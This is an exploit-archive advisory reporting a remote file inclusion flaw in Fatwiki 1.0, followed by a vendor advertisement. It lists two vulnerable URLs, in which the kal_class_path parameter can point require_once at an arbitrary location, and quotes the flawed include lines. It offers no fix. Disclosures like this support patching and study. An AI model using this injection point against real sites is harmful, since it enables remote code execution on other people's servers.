Fatwiki (fwiki) version 1.0 Remote File include vulnerabilit
=======================================
Fatwiki (fwiki) Remote FiLe include RFI
=======================================
#############################################################################################################
## Fatwiki (fwiki) Remote FiLe include RFI ##
#############################################################################################################
[ Software Information ]
[+] Vendor : http://galupki.de/
[+] Download : http://galupki.de/zip/fwiki_10b.zip
[+] version : 1.0
[+] Vulnerability : RFI
[+] Dork : syalalala
[+] LOCATION : INDONESIA - JOGJA
#############################################################################################################
[ Vulnerable File ]
http://127.0.0.1/[kaMtiEz]/datumscalc.php?kal_class_path=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/monatsblatt.php?kal_class_path=[INDONESIANCODER]
[ BUG ]
[!] datumscalc.php
- require_once("$kal_class_path/kalender.class.php");
- require_once("$kal_class_path/feiertage.class.php");
- require_once("$kal_class_path/sonnemond.class.php");
[!] monatsblatt.php
- require_once("$kal_class_path/kalender.class.php");
- require_once("$kal_class_path/feiertage.class.php");
- require_once("$kal_class_path/sonnemond.class.php");
- require_once("$kal_class_path/minikal.php");
[ FIX ]
dunno :">
#############################################################################################################
# 0day.today [2018-02-06] #
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo